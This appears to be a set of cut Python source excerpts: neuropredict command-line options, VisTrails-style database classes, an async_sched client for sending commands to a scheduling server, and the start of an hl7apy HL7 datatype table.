The 'exhaustive' option will try to most parameter values for the most parameters that can be optimized.
""")
help_text_make_vis = textwrap.dedent("""
Option to make visualizations from existing results in the given path.
This is helpful when neuropredict failed to generate result figures automatically
e.g. on a HPC cluster, or another environment when DISPLAY is either not available.
""")
help_text_atlas = textwrap.dedent("""
Name of the atlas to use for visualization. Default: fsaverage, if available.
\n \n """)
help_text_num_cpus = textwrap.dedent("""
Number of CPUs to use to parallelize CV repetitions.
Default : 4.
Number of CPUs will be capped at the number available on the machine if higher is requested.
\n \n """)
help_text_out_dir = textwrap.dedent("""
Output folder to store gathered features & results.
\n \n """)
help_classifier = textwrap.dedent("""
String specifying one of the implemented classifiers.
(Classifiers are carefully chosen to allow for the comprehensive report provided by neuropredict).
Default: 'RandomForestClassifier'
""")
help_feat_select_method = textwrap.dedent("""
Feature selection method to apply prior to training the classifier.
Default: 'VarianceThreshold', removing features with 0.001 percent of lowest variance (zeros etc).
""")
parser.add_argument("-m", "--meta_file", action="store", dest="meta_file",
default=None, required=False, help=help_text_metadata_file)
parser.add_argument("-o", "--out_dir", action="store", dest="out_dir", required=False, help=help_text_out_dir,
default=None )
parser.add_argument("-f", "--fs_subject_dir", action="store", dest="fs_subject_dir",
default=None, help=help_text_fs_dir)
user_defined = parser.add_argument_group(title='Input data and formats',
description='Only one of the following types can be specified.')
user_defined.add_argument("-y", "--pyradigm_paths", action="store", dest="pyradigm_paths",
nargs='+', # to allow for multiple features
default=None,
help=help_text_pyradigm_paths)
user_defined.add_argument("-u", "--user_feature_paths", action="store", dest="user_feature_paths",
nargs='+', # to allow for multiple features
default=None,
help=help_text_user_defined_folder)
user_defined.add_argument("-d", "--data_matrix_paths", action="store", dest="data_matrix_paths",
nargs='+',
default=None,
help=help_text_data_matrix)
user_defined.add_argument("-a", "--arff_paths", action="store", | |
= completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def getPrimaryKey(self):
return self._db_id
class DBLoopExec(object):
vtType = 'loop_exec'
def __init__(self, id=None, ts_start=None, ts_end=None, completed=None, error=None, module_execs=None, group_execs=None):
self._db_id = id
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_completed = completed
self._db_error = error
self.db_deleted_module_execs = []
self.db_module_execs_id_index = {}
if module_execs is None:
self._db_module_execs = []
else:
self._db_module_execs = module_execs
for v in self._db_module_execs:
self.db_module_execs_id_index[v.db_id] = v
self.db_deleted_group_execs = []
self.db_group_execs_id_index = {}
if group_execs is None:
self._db_group_execs = []
else:
self._db_group_execs = group_execs
for v in self._db_group_execs:
self.db_group_execs_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBLoopExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBLoopExec(id=self._db_id,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
completed=self._db_completed,
error=self._db_error)
if self._db_module_execs is None:
cp._db_module_execs = []
else:
cp._db_module_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_module_execs]
if self._db_group_execs is None:
cp._db_group_execs = []
else:
cp._db_group_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_group_execs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_module_execs_id_index = dict((v.db_id, v) for v in cp._db_module_execs)
cp.db_group_execs_id_index = dict((v.db_id, v) for v in cp._db_group_execs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBLoopExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'error' in class_dict:
res = class_dict['error'](old_obj, trans_dict)
new_obj.db_error = res
elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
new_obj.db_error = old_obj.db_error
if 'module_execs' in class_dict:
res = class_dict['module_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_module_exec(obj)
elif hasattr(old_obj, 'db_module_execs') and old_obj.db_module_execs is not None:
for obj in old_obj.db_module_execs:
new_obj.db_add_module_exec(DBModuleExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_module_execs') and hasattr(new_obj, 'db_deleted_module_execs'):
for obj in old_obj.db_deleted_module_execs:
n_obj = DBModuleExec.update_version(obj, trans_dict)
new_obj.db_deleted_module_execs.append(n_obj)
if 'group_execs' in class_dict:
res = class_dict['group_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_group_exec(obj)
elif hasattr(old_obj, 'db_group_execs') and old_obj.db_group_execs is not None:
for obj in old_obj.db_group_execs:
new_obj.db_add_group_exec(DBGroupExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_group_execs') and hasattr(new_obj, 'db_deleted_group_execs'):
for obj in old_obj.db_deleted_group_execs:
n_obj = DBGroupExec.update_version(obj, trans_dict)
new_obj.db_deleted_group_execs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_module_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_module_exec(child)
to_del = []
for child in self.db_group_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_group_exec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_module_execs)
children.extend(self.db_deleted_group_execs)
if remove:
self.db_deleted_module_execs = []
self.db_deleted_group_execs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_module_execs:
if child.has_changes():
return True
for child in self._db_group_execs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_error(self):
return self._db_error
def __set_db_error(self, error):
self._db_error = error
self.is_dirty = True
db_error = property(__get_db_error, __set_db_error)
def db_add_error(self, error):
self._db_error = error
def db_change_error(self, error):
self._db_error = error
def db_delete_error(self, error):
self._db_error = None
def __get_db_module_execs(self):
return self._db_module_execs
def __set_db_module_execs(self, module_execs):
self._db_module_execs = module_execs
self.is_dirty = True
db_module_execs = property(__get_db_module_execs, __set_db_module_execs)
def db_get_module_execs(self):
return self._db_module_execs
def db_add_module_exec(self, module_exec):
self.is_dirty = True
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_change_module_exec(self, module_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
self._db_module_execs[i] = module_exec
found = True
break
if not found:
self._db_module_execs.append(module_exec)
self.db_module_execs_id_index[module_exec.db_id] = module_exec
def db_delete_module_exec(self, module_exec):
self.is_dirty = True
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == module_exec.db_id:
if not self._db_module_execs[i].is_new:
self.db_deleted_module_execs.append(self._db_module_execs[i])
del self._db_module_execs[i]
break
del self.db_module_execs_id_index[module_exec.db_id]
def db_get_module_exec(self, key):
for i in xrange(len(self._db_module_execs)):
if self._db_module_execs[i].db_id == key:
return self._db_module_execs[i]
return None
def db_get_module_exec_by_id(self, key):
return self.db_module_execs_id_index[key]
def db_has_module_exec_with_id(self, key):
return key in self.db_module_execs_id_index
def __get_db_group_execs(self):
return self._db_group_execs
def __set_db_group_execs(self, group_execs):
self._db_group_execs = group_execs
self.is_dirty = True
db_group_execs = property(__get_db_group_execs, __set_db_group_execs)
def db_get_group_execs(self):
return self._db_group_execs
def db_add_group_exec(self, group_exec):
self.is_dirty = True
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_change_group_exec(self, group_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
self._db_group_execs[i] = group_exec
found = True
break
if not found:
self._db_group_execs.append(group_exec)
self.db_group_execs_id_index[group_exec.db_id] = group_exec
def db_delete_group_exec(self, group_exec):
self.is_dirty = True
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == group_exec.db_id:
if not self._db_group_execs[i].is_new:
self.db_deleted_group_execs.append(self._db_group_execs[i])
del self._db_group_execs[i]
break
del self.db_group_execs_id_index[group_exec.db_id]
def db_get_group_exec(self, key):
for i in xrange(len(self._db_group_execs)):
if self._db_group_execs[i].db_id == key:
return self._db_group_execs[i]
return None
def db_get_group_exec_by_id(self, key):
return self.db_group_execs_id_index[key]
def db_has_group_exec_with_id(self, key):
return key in self.db_group_execs_id_index
def getPrimaryKey(self):
return self._db_id
class DBConnection(object):
vtType = 'connection'
def __init__(self, id=None, ports=None):
self._db_id = id
self.db_deleted_ports = []
self.db_ports_id_index = {}
self.db_ports_type_index = {}
if ports is None:
self._db_ports = []
else:
self._db_ports = ports
for v in self._db_ports:
self.db_ports_id_index[v.db_id] = v
self.db_ports_type_index[v.db_type] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBConnection.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBConnection(id=self._db_id)
if self._db_ports is None:
cp._db_ports = []
else:
cp._db_ports = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_ports]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_ports_id_index = dict((v.db_id, v) for v in cp._db_ports)
cp.db_ports_type_index = dict((v.db_type, v) for v in cp._db_ports)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBConnection()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ports' in class_dict:
res = class_dict['ports'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_port(obj)
elif hasattr(old_obj, 'db_ports') and old_obj.db_ports is not None:
for obj in old_obj.db_ports:
new_obj.db_add_port(DBPort.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_ports') and hasattr(new_obj, 'db_deleted_ports'):
for obj in old_obj.db_deleted_ports:
n_obj = DBPort.update_version(obj, trans_dict)
new_obj.db_deleted_ports.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_ports:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_port(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_ports)
if remove:
self.db_deleted_ports = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_ports:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
| |
import asyncio
from typing import Union, Tuple
from serial_json import DataClass
from async_sched.utils import get_loop
from async_sched.schedule import Schedule
from async_sched.server.messages import Quit, Update, RunCommand, ScheduleCommand, ListSchedules, StopSchedule
__all__ = ['Client',
'quit_server_async', 'quit_server', 'update_server_async', 'update_server', 'request_schedules_async',
'request_schedules', 'run_command_async', 'run_command', 'schedule_command_async', 'schedule_command',
'stop_schedule_async', 'stop_schedule']
class Client(object):
READ_SIZE = 4096
def __init__(self, addr: Union[str, Tuple[str, int]] = None, port: int = 8000,
loop: asyncio.AbstractEventLoop = None):
if not isinstance(addr, (list, tuple)):
addr = (addr, port)
if len(addr) == 1:
addr = addr + (port,)
self._loop = loop
self.reader = None
self.writer = None
self._is_connected = False
self.ip_address = addr[0]
self.port = addr[1]
@property
def loop(self) -> 'asyncio.AbstractEventLoop':
if self._loop is not None:
return self._loop
return get_loop()
@loop.setter
def loop(self, loop: asyncio.AbstractEventLoop):
self._loop = loop
async def is_connected(self):
"""Return if the client is connected"""
return self._is_connected
def start(self, addr: Union[str, Tuple[str, int]] = None, port: int = None, **kwargs) -> 'Client':
"""Add a task to start running the server forever."""
self.server_task = self.loop.create_task(self.start_async(addr=addr, port=port, **kwargs), name='client')
return self
async def start_async(self, addr: Union[str, Tuple[str, int]] = None, port: int = None, **kwargs):
"""Start the connection."""
if isinstance(addr, (list, tuple)):
if len(addr) > 0:
self.ip_address = addr[0]
if len(addr) > 1:
self.port = addr[1]
elif isinstance(addr, str):
self.ip_address = addr
if isinstance(port, int):
self.port = port
self.reader, self.writer = await asyncio.open_connection(self.ip_address, self.port, **kwargs)
return self
async def stop_async(self):
"""Stop the connection"""
if self.writer is not None:
self.writer.close()
await self.writer.wait_closed()
self.writer = None
self.reader = None
return self
async def send_quit(self):
"""Send the quit command."""
self.writer.write(Quit().json().encode())
await self.writer.drain()
data = await self.reader.read(self.READ_SIZE)
message = DataClass.from_json(data)
print(f'{message.message}')
return message
async def send_update(self, module_name: str = ''):
"""Send the quit command.
Args:
module_name (str)['']: Module name to import/reload. If blank import/reload all modules.
"""
self.writer.write(Update(module_name=module_name).json().encode())
await self.writer.drain()
data = await self.reader.read(self.READ_SIZE)
message = DataClass.from_json(data)
print(f'{message.message}')
return message
async def request_schedules(self, print_results=True):
"""Print the list of schedules."""
self.writer.write(ListSchedules().json().encode())
await self.writer.drain()
data = await self.reader.read(self.READ_SIZE)
if not data:
data = await self.reader.read(self.READ_SIZE)
message = DataClass.from_json(data)
if print_results:
print('Running Schedules:')
for running in message.schedules:
print(f' {running.name} = {running.schedule}')
return message
async def run_command(self, callback_name, *args, **kwargs):
"""Run the given command name on the remote server."""
self.writer.write(RunCommand(callback_name=callback_name, args=args, kwargs=kwargs).json().encode())
await self.writer.drain()
data = await self.reader.read(self.READ_SIZE)
message = DataClass.from_json(data)
print(f'{message.message}')
return message
async def schedule_command(self, name: str, schedule: Schedule, callback_name, *args, **kwargs):
"""Schedule a command to run on the remote server."""
json = ScheduleCommand(name=name, schedule=schedule,
callback_name=callback_name, args=args, kwargs=kwargs).json()
self.writer.write(json.encode())
await self.writer.drain()
data = await self.reader.read(self.READ_SIZE)
message = DataClass.from_json(data)
print(f'{message.message}')
return message
async def stop_schedule(self, name: str):
"""Stop a running schedule."""
self.writer.write(StopSchedule(name=name).json().encode())
await self.writer.drain()
data = await self.reader.read(self.READ_SIZE)
message = DataClass.from_json(data)
print(f'{message.message}')
return message
async def __aenter__(self):
if not await self.is_connected():
await self.start_async()
return self
async def __aexit__(self, *args, **kwargs):
await self.stop_async()
def __enter__(self):
if not self._is_connected:
self.loop.run_until_complete(self.start_async())
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.loop.run_until_complete(self.stop_async())
return exc_type is not None
# ========== Loop Functions ==========
def create_task(self, coro, *, name=None):
"""Create a task to run on the loop"""
return self.loop.create_task(coro, name=name)
def run_until_complete(self, future):
"""Start running the asyncio event loop until the given future is complete."""
return self.loop.run_until_complete(future)
def run_forever(self):
"""Start running the asyncio event loop forever."""
return self.loop.run_forever()
async def quit_server_async(addr: Tuple[str, int]):
"""Send a command to the server to Quit.
Args:
addr (tuple): Server IP address
"""
async with Client(addr) as client:
return await client.send_quit()
def quit_server(addr: Tuple[str, int], loop: asyncio.AbstractEventLoop = None):
"""Send a command to the server to Quit.
Args:
addr (tuple): Server IP address
loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
"""
if loop is None:
loop = get_loop()
return loop.run_until_complete(quit_server_async(addr))
async def update_server_async(addr: Tuple[str, int], module_name: str = '', list_schedules: bool = False):
"""Send a command to the server to Update Commands by reading files in the command_path
Args:
addr (tuple): Server IP address
module_name (str)['']: Module name to import/reload. If blank import/reload all modules.
list_schedules (bool)[False]: If True request and print the schedules that the server is running.
"""
async with Client(addr) as client:
msg = await client.send_update(module_name=module_name)
if list_schedules:
msg = await client.request_schedules(print_results=True)
return msg
def update_server(addr: Tuple[str, int], module_name: str = '', list_schedules: bool = False,
loop: asyncio.AbstractEventLoop = None):
"""Send a command to the server to Update Commands.
Args:
addr (tuple): Server IP address
module_name (str)['']: Module name to import/reload. If blank import/reload all modules.
list_schedules (bool)[False]: If True request and print the schedules that the server is running.
loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
"""
if loop is None:
loop = get_loop()
return loop.run_until_complete(update_server_async(addr, module_name, list_schedules))
async def request_schedules_async(addr: Tuple[str, int], print_results: bool = True):
"""Send a command to the server to Update Commands by reading files in the command_path
Args:
addr (tuple): Server IP address
print_results (bool)[True]: If true print the schedules that were returned.
"""
async with Client(addr) as client:
return await client.request_schedules(print_results=print_results)
def request_schedules(addr: Tuple[str, int], print_results: bool = True, loop: asyncio.AbstractEventLoop = None):
"""Send a command to the server to Update Commands.
Args:
addr (tuple): Server IP address
print_results (bool)[True]: If true print the schedules that were returned.
loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
"""
if loop is None:
loop = get_loop()
return loop.run_until_complete(request_schedules_async(addr, print_results=print_results))
async def run_command_async(addr: Tuple[str, int],
callback_name: str = '', *args, **kwargs):
"""Send a command to the server to run a registered callback function with the given arguments.
Args:
addr (tuple): Server IP address
callback_name (str)['']: Name of the registered callback function.
*args: Positional arguments for the callback function.
**kwargs: Keyword Arguments for the callback function.
"""
if not callback_name:
raise ValueError('Invalid callback name given')
async with Client(addr) as client:
return await client.run_command(callback_name, *args, **kwargs)
def run_command(addr: Tuple[str, int],
callback_name: str = '', *args, loop: asyncio.AbstractEventLoop = None, **kwargs):
"""Send a command to the server to run a registered callback function with the given arguments.
Args:
addr (tuple): Server IP address
callback_name (str)['']: Name of the registered callback function.
*args: Positional arguments for the callback function.
**kwargs: Keyword Arguments for the callback function.
loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
"""
if loop is None:
loop = get_loop()
return loop.run_until_complete(run_command_async(addr, callback_name, *args, **kwargs))
async def schedule_command_async(addr: Tuple[str, int],
name: str = '', schedule: Schedule = None, callback_name: str = '', *args, **kwargs):
"""Send a command to the server to schedule a callback function to run.
Args:
addr (tuple): Server IP address
name (str)['']: Name of the schedule.
schedule (Schedule)[None]: Schedule to run the callback function with.
callback_name (str)['']: Name of the registered callback function.
*args: Positional arguments for the callback function.
**kwargs: Keyword Arguments for the callback function.
"""
if not name:
raise ValueError('Must give a name to keep track of the schedule!')
if schedule is None:
raise ValueError('Invalid schedule given!')
if not callback_name:
raise ValueError('Invalid callback name given!')
async with Client(addr) as client:
return await client.schedule_command(name, schedule, callback_name, *args, **kwargs)
def schedule_command(addr: Tuple[str, int],
name: str = '', schedule: Schedule = None, callback_name: str = '', *args,
loop: asyncio.AbstractEventLoop = None, **kwargs):
"""Send a command to the server to schedule a callback function to run.
Args:
addr (tuple): Server IP address
name (str)['']: Name of the schedule.
schedule (Schedule)[None]: Schedule to run the callback function with.
callback_name (str)['']: Name of the registered callback function.
*args: Positional arguments for the callback function.
**kwargs: Keyword Arguments for the callback function.
loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
"""
if loop is None:
loop = get_loop()
return loop.run_until_complete(schedule_command_async(addr, name, schedule, callback_name, *args, **kwargs))
async def stop_schedule_async(addr: Tuple[str, int], name: str = '', list_schedules: bool = False):
"""Send a command to the server to stop running a schedule.
Args:
addr (tuple): Server IP address
name (str)['']: Name of the schedule.
list_schedules (bool)[False]: If True request and print the schedules that the server is running.
"""
if not name:
raise ValueError('Must give a name to keep track of the schedule!')
async with Client(addr) as client:
msg = await | |
<gh_stars>100-1000
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2018, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from hl7apy.utils import iteritems
DATATYPES = {
'AD_1': ['leaf', None, 'ST', 'STREET_ADDRESS', None, -1],
'AD_2': ['leaf', None, 'ST', 'OTHER_DESIGNATION', None, -1],
'AD_3': ['leaf', None, 'ST', 'CITY', None, -1],
'AD_4': ['leaf', None, 'ST', 'STATE_OR_PROVINCE', None, -1],
'AD_5': ['leaf', None, 'ID', 'ZIP_OR_POSTAL_CODE', None, -1],
'AD_6': ['leaf', None, 'ID', 'COUNTRY', None, -1],
'AD_7': ['leaf', None, 'ID', 'TYPE', None, -1],
'AD_8': ['leaf', None, 'ST', 'OTHER_GEOGRAPHIC_DESIGNATION', None, -1],
'CE_1': ['leaf', None, 'ID', 'IDENTIFIER', None, -1],
'CE_2': ['leaf', None, 'ST', 'TEXT', None, -1],
'CE_3': ['leaf', None, 'ST', 'NAME_OF_CODING_SYSTEM', None, -1],
'CE_4': ['leaf', None, 'ST', 'ALTERNATE_IDENTIFIER', None, -1],
'CE_5': ['leaf', None, 'ST', 'ALTERNATE_TEXT', None, -1],
'CE_6': ['leaf', None, 'ST', 'NAME_OF_ALTERNATE_CODING_SYSTEM', None, -1],
'CK_1': ['leaf', None, 'NM', 'ID_NUMBER', None, -1],
'CK_2': ['leaf', None, 'NM', 'CHECK_DIGIT', None, -1],
'CK_3': ['leaf', None, 'ID', 'CHECK_DIGIT_SCHEME', 'HL70061', -1],
'CK_4': ['leaf', None, 'ST', 'ASSIGNING_FACILITY_ID', None, -1],
'CK_ACCOUNT_NO_1': ['leaf', None, 'NM', 'ACCOUNT_NUMBER', None, -1],
'CK_ACCOUNT_NO_2': ['leaf', None, 'NM', 'CHECK_DIGIT', None, -1],
'CK_ACCOUNT_NO_3': ['leaf', None, 'ID', 'CHECK_DIGIT_SCHEME', None, -1],
'CK_ACCOUNT_NO_4': ['leaf', None, 'ID', 'FACILITY_ID', None, -1],
'CM_ABS_RANGE_1': ['sequence', None, 'CM_RANGE_SIMPLE', 'RANGE', None, -1],
'CM_ABS_RANGE_2': ['leaf', None, 'NM', 'NUMERIC_CHANGE', None, -1],
'CM_ABS_RANGE_3': ['leaf', None, 'NM', 'PERCENT_PER_CHANGE', None, -1],
'CM_ABS_RANGE_4': ['leaf', None, 'NM', 'DAYS', None, -1],
'CM_AUI_1': ['leaf', None, 'ST', 'AUTHORIZATION_NUMBER', None, -1],
'CM_AUI_2': ['leaf', None, 'DT', 'DATE', None, -1],
'CM_AUI_3': ['leaf', None, 'ST', 'SOURCE', None, -1],
'CM_BATCH_TOTAL_1': ['leaf', None, 'NM', 'CM_BATCH_TOTAL_1', None, -1],
'CM_BATCH_TOTAL_2': ['leaf', None, 'NM', 'CM_BATCH_TOTAL_2', None, -1],
'CM_CCD_1': ['leaf', None, 'ID', 'WHEN_TO_CHARGE', None, -1],
'CM_CCD_2': ['sequence', None, 'TS', 'DATE_TIME', None, -1],
'CM_DDI_1': ['leaf', None, 'ST', 'DELAY_DAYS', None, -1],
'CM_DDI_2': ['leaf', None, 'NM', 'AMOUNT', None, -1],
'CM_DDI_3': ['leaf', None, 'NM', 'NUMBER_OF_DAYS', None, -1],
'CM_DIN_1': ['sequence', None, 'TS', 'DATE', None, -1],
'CM_DIN_2': ['sequence', None, 'CE', 'INSTITUTION_NAME', None, -1],
'CM_DLD_1': ['leaf', None, 'ID', 'DISCHARGE_LOCATION', None, -1],
'CM_DLD_2': ['sequence', None, 'TS', 'EFFECTIVE_DATE', None, -1],
'CM_DLT_1': ['sequence', None, 'CM_RANGE_SIMPLE', 'RANGE', None, -1],
'CM_DLT_2': ['leaf', None, 'NM', 'NUMERIC_THRESHOLD', None, -1],
'CM_DLT_3': ['leaf', None, 'ST', 'CHANGE', None, -1],
'CM_DLT_4': ['leaf', None, 'NM', 'LENGTH_OF_TIME_DAYS', None, -1],
'CM_DTN_1': ['leaf', None, 'ID', 'DAY_TYPE', None, -1],
'CM_DTN_2': ['leaf', None, 'NM', 'NUMBER_OF_DAYS', None, -1],
'CM_EIP_1': ['leaf', None, 'ST', 'PARENT_S_PLACER_ORDER_NUMBER', None, -1],
'CM_EIP_2': ['leaf', None, 'ST', 'PARENT_S_FILLER_ORDER_NUMBER', None, -1],
'CM_ELD_1': ['leaf', None, 'ST', 'SEGMENT_ID', None, -1],
'CM_ELD_2': ['leaf', None, 'NM', 'SEQUENCE', None, -1],
'CM_ELD_3': ['leaf', None, 'NM', 'FIELD_POSITION', None, -1],
'CM_ELD_4': ['sequence', None, 'CE', 'CODE_IDENTIFYING_ERROR', None, -1],
'CM_FILLER_1': ['leaf', None, 'ID', 'UNIQUE_FILLER_ID', None, -1],
'CM_FILLER_2': ['leaf', None, 'ID', 'FILLER_APPLICATION_ID', None, -1],
'CM_FINANCE_1': ['leaf', None, 'ID', 'FINANCIAL_CLASS_ID', None, -1],
'CM_FINANCE_2': ['sequence', None, 'TS', 'EFFECTIVE_DATE', None, -1],
'CM_GROUP_ID_1': ['leaf', None, 'ID', 'UNIQUE_GROUP_ID', None, -1],
'CM_GROUP_ID_2': ['leaf', None, 'ID', 'PLACER_APPLICATION_ID', None, -1],
'CM_INTERNAL_LOCATION_1': ['leaf', None, 'ID', 'NURSE_UNIT_STATION', None, -1],
'CM_INTERNAL_LOCATION_2': ['leaf', None, 'ID', 'ROOM', None, -1],
'CM_INTERNAL_LOCATION_3': ['leaf', None, 'ID', 'BED', None, -1],
'CM_INTERNAL_LOCATION_4': ['leaf', None, 'ID', 'FACILITY_ID', None, -1],
'CM_INTERNAL_LOCATION_5': ['leaf', None, 'ID', 'BED_STATUS', None, -1],
'CM_INTERNAL_LOCATION_6': ['leaf', None, 'ID', 'ETAGE', None, -1],
'CM_INTERNAL_LOCATION_7': ['leaf', None, 'ID', 'KLINIK', None, -1],
'CM_INTERNAL_LOCATION_8': ['leaf', None, 'ID', 'ZENTRUM', None, -1],
'CM_JOB_CODE_1': ['leaf', None, 'ID', 'JOB_CODE', None, -1],
